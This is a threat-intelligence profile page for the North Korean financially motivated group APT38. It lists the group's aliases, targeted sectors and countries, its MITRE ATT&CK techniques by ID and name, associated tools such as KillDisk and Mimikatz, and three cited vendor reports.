← threatfilter.dev / all groups / APT38
APT38
Also known as: NICKEL GLADSTONE · BeagleBoyz · Bluenoroff · Stardust Chollima · Sapphire Sleet · COPERNICIUM
Overview
APT38 is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau. Active since at least 2014, APT38 has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which APT38 stole $81 million, as well as attacks against Bancomext and Banco de Chile ; some of their attacks have been destructive. North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name Lazarus Group instead of tracking clusters or subgroups.
Targets
Government · Private sector
Regions
Australia · Bangladesh · Bangladesh Bank · Brazil · Canada · China · Cryptocurrency exchanges in South Korea · France · Germany · Guatemala · Hong Kong · India · Japan · Sony Pictures Entertainment · South Korea · Thailand · United Kingdom · United States
Capabilities
- Destructive / data-wiping operations — ATT&CK T1485, T1561.002; software: KillDisk
- Custom malware/implant development — ATT&CK: 4 attributed custom malware families
TTPs — 56 techniques across 12 tactics
Initial Access
-
T1189Drive-by Compromise -
T1566.001Spearphishing Attachment
Execution
-
T1053.003Cron -
T1053.005Scheduled Task -
T1059.001PowerShell -
T1059.003Windows Command Shell -
T1059.005Visual Basic -
T1106Native API -
T1204.001Malicious Link -
T1204.002Malicious File -
T1569.002Service Execution
Persistence
-
T1505.003Web Shell -
T1543.003Windows Service
Privilege Escalation
-
T1548.002Bypass User Account Control
Stealth
-
T1027.002Software Packing -
T1036.003Rename Legitimate Utilities -
T1036.006Space after Filename -
T1055Process Injection -
T1070.004File Deletion -
T1070.006Timestomp -
T1140Deobfuscate/Decode Files or Information -
T1218.001Compiled HTML File -
T1218.005Mshta -
T1218.007Msiexec -
T1218.011Rundll32 -
T1480.002Mutual Exclusion
Defense Impairment
-
T1112Modify Registry -
T1553.005Mark-of-the-Web Bypass -
T1685Disable or Modify Tools -
T1685.005Clear Windows Event Logs -
T1686Disable or Modify System Firewall -
T1686.002Network Device Firewall -
T1690Prevent Command History Logging
Credential Access
-
T1110Brute Force
Discovery
-
T1033System Owner/User Discovery -
T1049System Network Connections Discovery -
T1057Process Discovery -
T1082System Information Discovery -
T1083File and Directory Discovery -
T1135Network Share Discovery -
T1217Browser Information Discovery -
T1518.001Security Software Discovery
Collection
-
T1005Data from Local System -
T1056.001Keylogging -
T1115Clipboard Data
Command and Control
-
T1071.001Web Protocols -
T1105Ingress Tool Transfer
Impact
-
T1485Data Destruction -
T1486Data Encrypted for Impact -
T1529System Shutdown/Reboot -
T1561.002Disk Structure Wipe -
T1565.001Stored Data Manipulation -
T1565.002Transmitted Data Manipulation -
T1565.003Runtime Data Manipulation
Tools & malware (6)
ECCENTRICBANDWAGON · Net · HOPLIGHT · Mimikatz · KillDisk · DarkComet
Reporting (3)
- How Microsoft names threat actors — Microsoft
- NICKEL GLADSTONE Threat Profile — SecureWorks
- CrowdStrike 2021 Global Threat Report — CrowdStrike